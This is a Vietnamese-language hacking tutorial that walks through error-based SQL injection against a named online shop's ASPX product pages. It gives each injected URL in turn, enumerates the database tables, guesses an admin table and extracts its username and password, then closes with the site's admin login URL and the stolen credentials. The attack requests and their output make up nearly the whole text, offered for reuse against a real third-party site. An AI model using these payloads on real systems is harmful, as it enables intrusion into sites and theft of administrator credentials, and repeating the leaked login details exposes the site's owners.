Hướng Dẫn Tấn công ASPX qua SQLi
Victim: http://www.hienshop.vn/
--------------------------------------------------http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables))/Default.aspx
Conversion failed when converting the nvarchar value 'tblCategory' to data type int.
=>> tblCategory
---------------------------------------------------
Có được "tblCategory" ta thay tiếp vào để lấy table tiếp theo
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory')))/Default.aspx
Conversion failed when converting the nvarchar value 'tblComment' to data type int.
=>> tblComment
-------------------------------------------------
Có được "tblComment" ta lại thay vào tiếp như thế này
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment')))/Default.aspx
=>> Ta có "tblfooter"
-------------------------------------------------
Và ta thay tương tự như trên ta có
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment', 'tblfooter', 'tbllienhe', 'tblLogo', 'tblNews', 'tblOrder', 'tblOrderDetail')))/Default.aspx
=>> Vâng thông báo rất mất dạy, đéo được quá 260 từ. Thế thì sao, dùng kinh nghiệm đoán Table "thần chưởng". Tui thì đoán cmn đại là tblAdmin.
Và
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin'))/Default.aspx
CLGT này =>> AdminID
----------------------------------------------
Tới bước lấy thông tin User rồi:
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 UserName from tblAdmin))//Default.aspx
=>> dnlong
Thay chổ "UserName" thành "PassWord"
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 PassWord from tblAdmin))/Default.aspx
=>> Vẫn là dnlong
----------------------------------------------
Login Admin:
http://www.hienshop.vn/admin/Login.aspxID: dnlong
Pass: dnlong
Checked By Anh Hai Sài Gòn, Good Luck